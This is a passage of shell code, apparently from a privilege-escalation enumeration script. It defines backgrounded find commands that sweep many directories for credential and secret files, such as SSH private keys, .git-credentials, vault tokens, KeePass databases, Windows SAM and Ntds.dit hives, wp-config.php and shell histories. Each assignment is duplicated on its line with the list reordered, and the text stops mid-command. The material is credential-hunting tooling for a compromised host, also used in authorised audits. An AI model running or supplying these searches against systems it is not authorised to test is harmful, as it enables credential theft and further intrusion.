FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" -o -name \"bind\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"bind\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" -o -name \"bind\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"bind\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_BIN=`eval_bckgrd "find /bin -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_BIN=`eval_bckgrd "find /bin -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name 